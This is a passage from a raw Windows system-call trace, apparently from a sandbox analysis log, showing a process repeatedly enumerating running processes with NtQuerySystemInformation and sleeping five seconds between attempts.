ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.144] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.227] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.283] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.294] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.335] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.356] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.377] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.399] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 